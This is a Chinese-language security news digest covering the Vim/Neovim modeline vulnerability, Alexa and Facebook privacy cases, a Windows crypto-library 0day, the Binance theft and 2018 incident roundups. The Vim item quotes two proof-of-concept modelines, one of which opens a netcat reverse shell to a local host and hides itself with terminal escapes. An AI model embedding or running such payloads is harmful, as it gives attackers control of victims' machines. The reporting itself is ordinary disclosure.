分类: 今日推送

Vim 与 Neovim 曝出任意代码执行漏洞

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制,但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入,一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat 输出内容时,攻击还使用终端转义序列隐藏 modeline: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出: Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   (稿源:开源中国,封面源自网络。)

因 Alexa 经常收集儿童用户录音 亚马逊遭到起诉

据报道外媒,任何打开 YouTube 的人都能找到无数儿童在与 Alexa 开心交谈的视频。Alexa 是亚马逊推出的一款数字语音助手智能扬声器产品。在这款产品给用户带来便利、乐趣的同时,许多人却在担心由其带来的隐私问题。 日前,这家公司就因这个问题遇到了两起联邦诉讼。诉讼称 Alexa 经常在未经儿童或其父母同意的情况下对数百万名儿童进行录音和收集声纹。 获悉,其中一起诉讼于周二在西雅图联邦法院发起,原告为一名来自马萨诸塞州的 10 岁女孩。就在同一天,洛杉矶法院也接到了一起类似的诉讼,原告则为一名 8 岁的男孩。 诉讼的核心在于加利福尼亚州和华盛顿都被称为“两方同意州”。在这两个州中,如果想要对某人进行录音商家则必须要征得双方的同意才行。然而,西雅图的诉讼称,“亚马逊从未警告未注册用户,它正在为他们的 Alexa 互动创建持续的语音记录,更不用说征得他们的同意了。” 针对这两起诉讼案,亚马逊方面拒绝置评。   (稿源:cnBeta,封面源自网络。)

Facebook 研究 App 收集近 19 万用户数据 已被苹果封杀

新浪科技讯 北京时间 6 月 13 日早间消息,Facebook 从目前已停用的 Research 应用中收集了 18.7 万名用户的个人和敏感设备数据。苹果今年早些时候以违规为由封禁了这款应用。 Facebook 在提供给参议员理查德·布卢门塔尔(Richard Blumenthal)办公室的邮件中表示,该公司收集了 3.1 万名美国用户的数据,其中包括 4300 名年轻人。收集的其它数据来自印度用户。 今年早些时候,美国媒体调查发现,Facebook 和谷歌都在滥用苹果的企业开发者证书,这种证书主要用于开发仅供企业员工使用的 iPhone 和 iPad 应用。调查发现,这些公司违反了苹果的规定,在苹果 App Store 之外提供面向普通用户的应用。这些应用收集参与者使用设备的数据,了解他们的使用习惯,同时向用户支付报酬。 苹果为此先后撤销了 Facebook 和谷歌的企业开发者证书,封禁了这些应用。不过在回答议员的问题时,苹果表示,该公司不清楚有多少设备安装了 Facebook 的违规应用。 苹果联邦事务总监蒂莫西·鲍德利(Timothy Powderly)表示:“我们知道 Facebook Research 应用的配置文件是在 2017 年 4 月 19 日创建的,但这并不一定就是 Facebook 向终端用户分发配置文件的日期。” Facebook 表示,这款应用可以回溯至 2016 年。 美国媒体还获得了苹果和谷歌 3 月初致议员的邮件。邮件显示,这些“研究”应用依赖于自愿参与者从 App Store 之外的下载,需要用到苹果的开发者证书来安装。随后,应用将会安装根网络证书,允许应用从设备中收集所有数据,包括网页浏览历史、加密消息和应用活动,可能还包括来自好友的数据,用于竞争性分析。(维金)   (稿源:新浪科技,封面源自网络。)

Google 研究员披露 Windows 10 0day 漏洞

安全研究员 Tavis Ormandy‏ 是谷歌 “Project Zero” 团队的一员,负责寻找 0day 漏洞。他公开了一个可利用的 Windows 漏洞,目前,微软仍处于修复过程中。 Tavis Ormandy 发推文说他已经发现了 Windows 核心加密库的安全问题,“微软承诺在 90 天内修复它,结果没有”。于是在第 91 天,Ormandy 选择了公开这个漏洞。 该漏洞实际上是 SymCrypt 中的一个错误,SymCrypt 是负责在 Windows 10 中实现非对称加密算法和在 Windows 8 中实现对称加密算法的核心加密库。Ormandy 发现,通过使用格式错误的数字证书,他可以强迫 SymCrypt 计算进入无限循环。这将有效地对 Windows 服务器执行拒绝服务(DoS)攻击,例如,运行使用 VPN 或 Microsoft Exchange Server 进行电子邮件和日历时所需的 IPsec 协议的服务。 Ormandy 还指出,“许多处理不受信任内容的软件(如防病毒软件)会在不受信任的数据上调用这些例程,这将导致它们陷入僵局。” 不过,他还是将其评为低严重性漏洞,同时补充说,该漏洞可以让人相对轻松地拆除整个 Windows 机群,因此值得注意。 Ormandy 发布的公告提供了漏洞的详细信息,以及可能导致拒绝服务的格式错误的证书示例。 如前所述,Project Zero 有 90 天的披露截止日期。Ormandy 于 3 月 13 日首次报告此漏洞,然后在 3 月 26 日,微软确认将发布安全公告,并在 6 月 11 日的 Patch Tuesday 中对此进行修复。Ormandy 认为,“这是 91 天,但在延长期内,所以它是可以接受的。” 6 月 11 日,微软安全响应中心(MSRC)表示“该修补程序今天不会发布,并且由于测试中发现问题,在 7 月发布之前也不会修补好”,于是 Ormandy 公开了这个漏洞。 公开的漏洞地址:https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 消息来源:Forbes   (稿源:开源中国,封面源自网络。)

Binance 遭黑客入侵 损失价值超 4000 万美元的比特币

HackerNews.cc 5 月 8 日消息,全球最大的加密交易货币场所之一Binance,今日确认公司损失了近4100万美元的比特币。这似乎是该公司迄今为止遭受的最大黑客攻击。 Binance的CEO赵长鹏发声明说公司早在5月7号前就已发现大规模的安全漏洞。黑客因此窃取了大约7000个比特币,价值4060万美元。 据该公司称,恶意攻击者使用了各种攻击技术,包括网络钓鱼和计算机病毒,实施了这一入侵,并侵入了一个BTC热钱包(一个连接到互联网的加密货币钱包)。该钱包约占公司比特币持有总量的2%,并在一次交易中提取了被盗的比特币。更令人不安的是,该公司承认,黑客设法获取了用户的关键信息,如API密钥、双因素身份验证码,以及其他潜在的信息。这些信息是登录Binance帐户所必需的。但幸运的是,用来储存大部分资金的线下钱包即Binance的冷库仍然是安全的。此外,联网的个人用户钱包没有受到直接影响。 Binance已经将其平台上的所有存款和取款业务暂停了大约一周,同时全面审查了安全性并调查了这起事件。CEO表示,该公司去年建立了一个名为“用户安全资产基金(SAFU)”的内部保险机制,该机制将覆盖黑客攻击的全部金额,不会影响用户。   消息来源:Thehackernews, 译者:Vill,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

FTC 就 Facebook 隐私泄露惩罚问题未能达成一致意见

据外媒报道,来自《纽约时报》的一篇新报道称,FTC难以就针对Facebook隐私泄露的惩罚问题达成一致,该委员会成员还特别在意是否让这家公司的CE马克·扎克伯格承担个人责任。 据报道,Facebook因严重侵犯公众隐私而面临FTC的巨额罚款,这家社交网络公司表示将拨出30亿美元用于支付这笔罚款,另外它还可能会被要求在公司内部设立专注隐私工作的新职位。鉴于Facebook上季度的营收有151亿美元,30亿美元对其来说只是小菜一碟。 《纽约时报》的报道指出,FTC主席Joseph Simons已让委员会的三名共和党成员准备批准一项协议,然而其余两名民主党成员则坚持采取更加严厉的惩罚。不过据报道,Simons试图避开党派路线的决定,而这可能会引发政治后果或潜在诉讼。此外,被视为软弱回应的做法还可能会削弱公众对FTC的监管信心,特别是在欧洲实施了更为严格的监管规定之后。   (稿源:cnBeta,封面源自网络。)

FBI 发布 2018 年《互联网犯罪报告》 经济损失增幅巨大

据外媒SlashGear报道,美国联邦调查局(FBI)的互联网犯罪投诉中心(IC3)发布了2018年《互联网犯罪报告》。该文件显示了向FBI报告的犯罪统计数据,以及互联网上犯下的罪行总数。 2018年,这一年的经济损失估计几乎是2017年的两倍,这是追踪这些统计数据开始以来的最大增幅。 根据IC3,2018年因网络犯罪造成的总经济损失约为27亿美元。2017年的总额约为14.2亿美元,而2016年的总额约为14.5亿美元。2015年的损失有史以来首次突破10亿美元大关,而2014年的损失约为8亿美元。 IC3在过去五年的报告中收到的投诉数量似乎相当缓慢 – 但肯定不会下降。虽然损失迅速增加,但报告从2014年的26.9万起增加到2015年的28.8万起。2016年,IC3的投诉约为29.9万起,2017年高达30.2万起,2018年为35.2万起。 许多现代骗局仍然使用电子邮件 “薪资转移”骗局是一个很好的例子,表明受害者很少或根本不知道他们是犯罪的受害者,直到为时已晚。IC3在2018年仅接到100个关于这个特定骗局的电话,但损失估计达到1亿美元。 Payroll Diversion从钓鱼邮件开始,从不知情或容易被欺骗的员工那里获取员工登录信息。诈骗者使用所述登录信息将工资单从一个直接存款位置重定向到另一个直接存款位置,将收入发送到单独的帐户。这种骗局显然最适合教育、医疗保健和商业航空运输业的员工。 如果IC3的估计是正确的,那么2018年的Business Email Compromise损失将超过12亿美元。 年龄排名 无论您的年龄多大,您都可能成为网络犯罪的受害者。根据这份报告,年龄越大的人更有可能成为网络犯罪的受害者。 排名靠前的州   在美国境内,加利福尼亚州是2018年受害人数最多的州。紧随其后的是德克萨斯州和佛罗里达州,其次是纽约州、宾夕法尼亚州、弗吉尼亚州、伊利诺斯州。2018年,科罗拉多州和佐治亚州的受害者人数在4000-9999之间,其他所有州的人数都减少了。 经济损失最多的州依次是加利福尼亚州、德克萨斯州、佛罗里达州、纽约州、北卡罗来纳州、俄亥俄州、伊利诺伊州、密歇根州、新泽西州和马萨诸塞州。该名单上的前5个州中的每一个在2018年的经济损失都超过1亿美元。 请注意北卡罗来纳州的受害者人数并未排在前十位,但是经济损失的金额相当高。 您将在下面看到2018年《互联网犯罪》报告的一系列其他统计数据。这些部分显示了不同的犯罪类型和损失数额等。注意虚拟货币出现多次。       (稿源:cnBeta,封面源自网络。)  

微软疑淡化邮件服务被黑事件 知情者:实际情况更严重

据美国科技媒体Motherboard报道,微软证实,公司邮件服务的一些用户可能会成为黑客攻击目标。根据微软的声明,黑客曾入侵微软一个客户支持帐户,然后获取与客户邮件帐户有关的信息,比如邮件主题和沟通对象信息等。但Motherboard认为,实际情况似乎比声明所说更严重。 一位知情人士曾亲眼见过攻击,并在微软发表声明前描述此事,他还向Motherboard提供截图。按照这位知情人士的说法,黑客可以从大量Outlook、MSN、Hotmail邮件帐户获取邮件内容。随后微软向Motherboard确认,说黑客的确可以获取客户的邮件内容。 3月份,在微软公开确认攻击之前,消息人士曾经告诉Motherboard,黑客就可以通过一个客户支持门户进入任意邮件帐户,但企业级帐户除外。也就是说,企业付费之后获得的企业帐户不会受到影响,只有普通消费者帐户受到威胁。消息人士还介绍了攻击是怎样进行的,比如如何利用微软客户支持工具。周日时,消息人士再次谈到细节,提供进一步信息和截图,告诉Motherboard黑客可以获取哪些信息。 按微软原来的说法,黑客无法获取邮件内容或者附件。消息人士却认为,黑客可以完全获取邮件内容。周日时,消息人士再次提供一张截图,里面有“邮件正文”标签,还有消息人士编辑过的邮件正文。消息人士说,黑客使用的微软支持帐户属于高权限用户,它能接触的内容比其它员工多。 将截图交给微软,微软证实说它已经向部分用户发送通知,告诉他们邮件内容也受到影响。微软还说,只有一小部分用户受到影响,当中约有6%的用户其邮件内容存在泄露风险,不过微软没有透露具体总数字。 微软在声明中表示:“通过禁用存在风险的凭证,阻止作恶者入侵,我们已经解决问题,只有消费级帐户的极少一部分受到影响。”   (稿源:新浪科技,封面源自网络。)

2018 年信息安全相关大事件(国际篇)

纵观 2018 年网络安全事件,网络犯罪分子攻击手段变幻莫测,除了零日漏洞的利用外,勒索软件、恶意挖矿大行其道,区块链领域险象环生,暗网数据泄露更是层出不穷,而且攻击渠道日益变幻,IoT 设备、工业网亦成为不法黑客的攻击重点,以上这些皆都为整个网络空间安全环境带来全新挑战。 知道创宇 404 实验室通过监控、分析全球威胁活动信息,积极参与各类安全事件应急响应,并结合 2018 年全年国内外各个安全研究机构、安全厂商披露的重大网络攻击事件,基于这些重大攻击事件的攻击技术、危害程度等,评选出 2018 年信息安全相关大事件。 0x00 国际篇   1. Memcache DDoS 攻击 2018 年 3 月 1 日,Github 遭受遭 1.35TB 大小的 DDoS 攻击,随后的几天,NETSCOUT Arbor 再次确认了一起由 Memcache DDoS 造成的高达 1.7 Tbps 的反射放大 DDoS 攻击。在 2018 年上半年虚拟货币价值飙升、黑灰产转向至挖矿领域、反射放大攻击持续下降的情况下,利用 Memcache DDoS 造成如此大流量的攻击,其威力可见一斑。 2. Cisco 路由器被攻击事件 2018 年 1 月,Cisco 官方发布了一个有关 Cisco ASA 防火墙 webvpn 远程代码执行漏洞的公告。2018 年 3 月,Cisco 官方发布了 Cisco Smart Install 远程命令执行漏洞的安全公告。这两个漏洞都是未授权的远程命令执行漏洞,攻击者无需登录凭证等信息即可成功实施攻击。2018 年 4 月 6 日,一个名为 “JHT” 的黑客组织攻击了包括俄罗斯和伊朗在内的多个国家网络基础设施,遭受攻击的 Cisco 设备的配置文件会显示为美国国旗,所以该事件又被称为”美国国旗”事件。  3. 供应链攻击 供应链攻击一直以隐蔽、高效著称。2018 年供应链攻击在不同层面都有发生、发生原因也不尽相同。有火绒安全最先曝光的针对驱动人生公司进行的攻击,有由于 NodeJS 库作者随意给相关库权限导致被攻击者植入后门的攻击,也有感染易语言模块并使用“微信支付”进行勒索的勒索病毒。供应链中任何薄弱的地方都有可能导致供应链攻击的发生。  4. GPON 远程命令执行漏洞 2018 年 4 月 30 日,vpnMentor 公布了 GPON 路由器的两个高危漏洞,绕过验证漏洞(CVE-2018-10561)和命令注入漏洞(CVE-2018-10562)。结合这两个漏洞,只需要发送一次请求就可以在 GPON 路由器上执行任意命令。在该漏洞披露后的十天内,该漏洞就已经被多个僵尸网络家族整合、利用、在公网上以蠕虫的方式传播。  5. Java 反序列化漏洞 2018 年的 Java 反序列化漏洞还在持续爆发,在知道创宇 404 实验室 2018 年应急的漏洞中,受此影响最严重的是 WebLogic,该软件是美国 Oracle 公司出品的一个 Application Server。2018 年知道创宇 404 实验室应急 5 个 WebLogic 的反序列化漏洞。由于 Java 反序列化漏洞可以实现执行任意命令的攻击效果,是黑客用来传播病毒,挖矿程序等恶意软件的攻击方法之一。 6. Drupal 远程代码执行漏洞(Drupalgeddon2) Drupal 是使用 PHP 编写的开源内容管理框架,Drupal 社区是全球最大的开源社区之一,全球有 100 万个网站正在使用 Drupal,今年 3 月份,Drupal 安全团队披露了一个非常关键的(21/25 NIST等级)漏洞,被称为 Drupalgeddon 2(CVE-2018-7600),此漏洞允许未经身份验证的攻击者进行远程命令执行操作。 7. 数据泄漏事件 2018 年多起大型数据泄漏事件被曝光,2018 年 6 月 12 日,知道创宇暗网雷达监控到国内某视频网站数据库在暗网出售。2018 年 8 月 28 日,暗网雷达再次监控到国内某酒店开房数据在暗网出售。2018 年 11 月 30 日,某公司发布公告称,旗下某酒店数据库遭入侵,最多约 5 亿客人信息被泄漏。2018 年 12 月,一推特用户发文称国内超 2 亿用户的简历信息遭到泄漏。除此之外,facebook 向第三方机构泄漏个人信息数据也引起了极大的关注。随着暗网用户的增多,黑市及加密数字货币的发展,暗网威胁必定会持续增长,知道创宇 404 安全研究团队会持续通过技术手段来测绘暗网,提供威胁情报,追踪和对抗来自暗网的威胁。  8. EOS平台远程命令执行漏洞 2018 年 5 月末,360 公司 Vulcan(伏尔甘)团队发现 EOS 平台的一系列高危漏洞,部分漏洞可以在 EOS 节点上远程执行任意代码。这也就意味着攻击者可以利用这个漏洞直接控制和接管 EOS 上运行的所有节点。从漏洞危害等方面来说,称该漏洞为“史诗级”名副其实。  9. 多个区块链项目 RPC 接口安全问题 2018 年 3 月 20 日,慢雾区和 BLOCKCHAIN SECURITY LAB 揭秘了以太坊黑色情人节事件(以太坊偷渡漏洞)相关攻击细节。2018 年 8 月 1 日,知道创宇 404 实验室在前者的基础上结合蜜罐数据,补充了后偷渡时代多种利用以太坊RPC接口盗币的利用方式:离线攻击、重放攻击和爆破攻击。2018 年 08 月 20 日,知道创宇 404 实验室再次补充了一种攻击形式:“拾荒攻击”。RPC 接口并非以太坊独创,其在区块链项目中多有应用。2018 年 12 月 1 日,腾讯安全联合实验室对 NEO RPC 接口安全问题提出预警。区块链项目 RPC 接口在方便交易的同时,也带来了极大的安全隐患。 10. 区块链智能合约相关漏洞 区块链安全漏洞很多都出现在智能合约上。昊天塔(HaoTian)”是知道创宇 404 区块链安全研究团队独立开发的用于监控、扫描、分析、审计区块链智能合约安全自动化平台。将智能合约各种审计过程中遇到的问题总结成漏洞模型,并汇总为《知道创宇以太坊合约审计 CheckList》。涵盖了超过 29 种会在以太坊审计过程中会遇到的问题,其中部分问题更是会影响到 74.49% 已公开源码的合约。、 随着 2017 年年末的一款名为 CryptoKitties (以太猫)的区块链游戏爆火,智能合约 DApp 成了 2018 年区块链发展的主旋律。2018 年 4 月 22 日,攻击者利用 BEC 智能合约转账函数中的一处乘法溢出漏洞,清空了 BEC 的所有合约代币。2018 年 7 月 24 日,外国的一位安全研究者利用 Fomo3D 的 Airdrop 特性加上随机数漏洞,让 Fomo3D 损失了空投池中所有的代币。2018 年 8 月 22 日,Fomo3D 第一轮大奖被开出,攻击者利用以太坊底层的交易顺序问题获得了超过 10000 枚以太币,这个漏洞的曝光也标志着对交易顺序依赖的智能合约正式的死亡。包括以太坊 DApp 和 EOS DApp 在内,从实际的安全漏洞到业务安全问题,智能合约安全漏洞直接威胁着代币安全,这也标志着智能合约会经受着更大挑战。    

2018 年信息安全相关大事件(国内篇)

回顾 2018 年,网络犯罪分子通过不断升级攻击手段,进一步提高攻击成功率并加速感染设备的数量。凭借拓展攻击渠道和变换手段,发动 TB 级别 DDoS 攻击、瞄准区块链各节点、入侵 IoT 设备,都为现阶段的网络安全防护蒙上一层阴影。在网络安全环境和形势的持续变化中,如何切实有效的制定安全策略,构建出由内而外的安全生态体系,形成各环节协同高效的主动防护能力,变得至关重要。 知道创宇 404 实验室通过监控、分析全球威胁活动信息,积极参与各类安全事件应急响应,并结合 2018 年全年国内外各个安全研究机构、安全厂商披露的重大网络攻击事件,基于这些重大攻击事件的攻击技术、危害程度等,评选出 2018 年信息安全相关大事件。  0x02 国内具体安全事件排名    1. 驱动人生供应链事件 2018 年 12 月 14 日下午,一款通过“驱动人生”升级通道进行传播的木马突然爆发,在短短两个小时的时间内就感染了十万台电脑。通过后续调查发现,这是一起精心策划的供应链入侵事件。  2. 数据泄漏事件 2018 年 6 月 12 日,知道创宇暗网雷达监控到国内某视频网站数据库在暗网出售。2018 年 8 月 28 日,暗网雷达再次监控到国内某酒店开房数据在暗网出售。2018 年 12 月,一推特用户发文称国内超 2 亿用户的简历信息遭到泄漏。除此之外,facebook 向第三方机构泄漏个人信息数据也引起了极大的关注。随着暗网用户的增多,黑市及加密数字货币的发展,暗网威胁必定会持续增长,知道创宇 404 安全研究团队会持续通过技术手段来测绘暗网,提供威胁情报,追踪和对抗来自暗网的威胁。  3. 勒索病毒继续在内网肆虐 2018 年勒索病毒在永恒之蓝漏洞的助力下继续在内网肆虐。2018 年 11 月,知道创宇 404 实验室捕获到一款名为 Lucky 的勒索病毒。在对病毒加密算法进行分析后,知道创宇 404 安全研究团队发布了该勒索病毒的解密工具 (https://github.com/knownsec/Decrypt-ransomware)。  4. 虚拟货币交易所被攻击等事件 2018 年上半年是区块链行业飞速发展的时期。区块链行业发展速度与安全建设速度的不对等造成安全事件频发。除区块链本身的问题外,虚拟货币交易所等也是黑客攻击的主要目标之一。入侵交易所、通过交易所漏洞间接影响币价等攻击方式都是黑客常用的攻击手法。在这些攻击背后,往往都会造成巨大的损失。  5. Weblogic 组件多个远程命令执行漏洞 2018 年知道创宇 404 实验室应急了 5 个 WebLogic 的反序列化漏洞(CVE-2018-2628/2893/3245/3191/3252)。由于 Java 反序列化漏洞可以实现执行任意命令的攻击效果,这些漏洞都成为了黑客传播病毒,挖矿程序等恶意软件的攻击方法之一。  6. “应用克隆”攻击 2018 年 1 月 9 日,腾讯安全玄武实验室和知道创宇 404 实验室联合披露攻击威胁模型“应用克隆”。值得一提的是,几乎所有的移动应用都适用该攻击威胁模型。在该攻击威胁模型下,攻击者可以“克隆”用户账户,实现窃取隐私信息、盗取账号和资金等操作。  7. ZipperDown 通用漏洞 2018 年 5 月,盘古实验室在对 IOS 应用安全审计过程中发现了一类通用安全漏洞,可能影响 10% 的IOS 应用。该漏洞被取名为 ZipperDown。根据盘古实验室披露的信息,微博、陌陌、网易云音乐、QQ 音乐、快手等流行应用受影响。  8. 智能门锁安全需要被重视 随着物联网的发展,智能门锁应运而生,智能门锁的安全性却一直颇受争议。2018 年 5 月 26 日,第九届中国(永康)国际门业博览会上王海丽女士就通过特斯拉线圈打开了八家品牌商的智能门锁。除此之外,通过手机/指纹等方式开锁也引入了新的攻击面,重放等方式的攻击大放异彩。智能门锁厂家对智能门锁本身安全的不重视也让智能门锁漏洞被曝光后不修复或未完全修复成为了常态。  9. WEB 应用程序 0day 攻击事件 2018 年 6 月 13 日,知道创宇 404 积极防御团队通过知道创宇旗下云防御产品“创宇盾”防御拦截并捕获到一个针对某著名区块链交易所网站的攻击,通过分析,发现攻击者利用的正式 ECShop 2.x 版本的 0day 漏洞攻击。于 2018 年 6 月 14 日,提交到知道创宇 Seebug 漏洞平台并收录。 2018 年 12 月 10 日,ThinkPHP 官方发布《ThinkPHP 5.\*版本安全更新》,修复了一个远程代码执行漏洞。经过知道创宇 404 实验室积极防御团队排查相关日志,该漏洞尚处于 0day 阶段时就已经被用于攻击多个虚拟货币类、金融类网站。在漏洞详情披露后的一周时间内,该漏洞就已经被僵尸网络整合到恶意样本并通过蠕虫的方式在网络空间传播。 在2018年区块链虚拟货币价格高涨的刺激下 网络黑产利用 0day 攻击虚拟货币/金融类网站日益增多。  10. xiongmai 摄像头漏洞影响数百万摄像头 2018 年多个厂商/型号的摄像头被披露出多个漏洞。在知道创宇 404 实验室应急的漏洞中,影响设备数量最多的要属 Xiongmai IP 摄像头。通过 ZoomEye 搜索引擎能得到 200 万的 Xiongmai 设备暴露在公网上,但是通过枚举 Cloud ID,能访问到约 900 万 Xiongmai 设备。并且该设备还存在着硬编码凭证和远程代码执行漏洞,如果这些设备被用来传播僵尸网络,将会给网络空间造成巨大的危害。